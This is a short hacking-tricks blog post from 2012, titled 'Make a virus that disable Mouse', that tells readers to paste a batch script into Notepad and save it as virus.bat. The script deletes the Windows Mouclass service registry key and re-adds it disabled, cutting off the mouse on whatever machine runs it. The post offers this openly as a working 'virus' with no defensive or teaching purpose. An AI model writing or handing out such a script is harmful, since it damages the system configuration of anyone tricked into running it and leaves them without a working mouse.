NOTE : Password for the rar file is tricks4u
Wednesday, November 07, 2012
Secrets of Super Hacker
NOTE : Password for the rar file is tricks4u
Make a virus that disable Mouse
2146: Posted by Mahendra Reddy
- Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
- Save this file as virus.bat
- Done you just created your virus.
Subscribe to:
Posts (Atom)